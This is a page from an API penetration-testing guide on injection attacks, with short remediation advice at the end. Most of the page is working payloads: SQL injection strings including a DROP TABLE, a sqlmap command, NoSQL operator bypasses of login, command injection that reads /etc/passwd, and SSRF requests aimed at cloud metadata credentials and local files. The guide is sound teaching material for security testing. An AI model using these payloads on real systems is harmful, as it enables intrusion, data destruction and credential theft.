API Security API8 API10

Injection Attacks

Injection flaws occur when untrusted data is sent to an interpreter as part of a command or query. In APIs, this often manifests as SQL Injection, NoSQL Injection, Command Injection, or Server-Side Request Forgery (SSRF).

SQL Injection (SQLi)

Test all input vectors including query parameters, JSON body, and headers.

Query Parameters

Inject SQL syntax into URL parameters.

http 
GET /api/users?id=1'
GET /api/users?id=1"
GET /api/users?id=1 OR 1=1
GET /api/users?id=1; DROP TABLE users--

JSON Body

Inject into JSON fields.

http 
POST /api/login
Content-Type: application/json

{
  "username": "admin' --",
  "password": "password"
}

Headers

Inject into headers like User-Agent.

http 
User-Agent: ' OR 1=1--

Automated Testing

Use SQLMap for automated detection and exploitation.

bash 
sqlmap -u "https://api.target.com/api/users?id=1" --batch --banner

NoSQL Injection

NoSQL databases (like MongoDB) are also vulnerable, often through operator injection.

Basic Bypass

Use operators like $ne (not equal) to bypass authentication.

http 
GET /api/users?username[$ne]=admin&password[$ne]=admin

JSON Body Injection

Inject operators into JSON objects.

http 
POST /api/login
Content-Type: application/json

{
  "username": {"$ne": null},
  "password": {"$ne": null}
}

Regex Injection

Use regex to match patterns.

http 
POST /api/login
Content-Type: application/json

{
  "username": {"$regex": "^admin"},
  "password": {"$ne": null}
}

Command Injection

If the API executes system commands with user input, it might be vulnerable.

Basic Injection

Use command separators like ;, &&, |.

http 
GET /api/ping?host=127.0.0.1; id
GET /api/ping?host=127.0.0.1 && cat /etc/passwd
GET /api/ping?host=127.0.0.1 | whoami
GET /api/ping?host=$(hostname)
GET /api/ping?host=`id`

Blind Injection

Use time-based payloads if output is not returned.

http 
GET /api/ping?host=127.0.0.1; sleep 10

Server-Side Request Forgery (SSRF)

SSRF allows an attacker to induce the server to make requests to unintended locations.

Internal Scanning

Target internal IP addresses or localhost.

http 
POST /api/webhook
Content-Type: application/json

{
  "url": "http://localhost:80"
}
http 
POST /api/scan
Content-Type: application/json

{
  "target": "192.168.1.1"
}

Cloud Metadata

Target cloud metadata services to steal credentials.

http 
POST /api/webhook
Content-Type: application/json

{
  "url": "http://169.254.169.254/latest/meta-data/"
}

File Scheme

Try to read local files using the file:// scheme.

http 
POST /api/render
Content-Type: application/json

{
  "url": "file:///etc/passwd"
}

Remediation

Defense Strategies

  • Use parameterized queries (Prepared Statements) for all database access.
  • Validate and sanitize all user input against a strict allowlist.
  • Avoid using `eval()`, `exec()`, or `system()` functions with user input.
  • Implement strict URL validation for webhooks and external fetches (allowlist domains).
  • Run API services with least privilege (non-root user).

Related Topics

← Back to API Pentesting

Overview of API security testing

Rate Limiting

DoS and resource exhaustion

GraphQL Testing

GraphQL-specific attacks

SQL Injection Guide

In-depth SQL injection techniques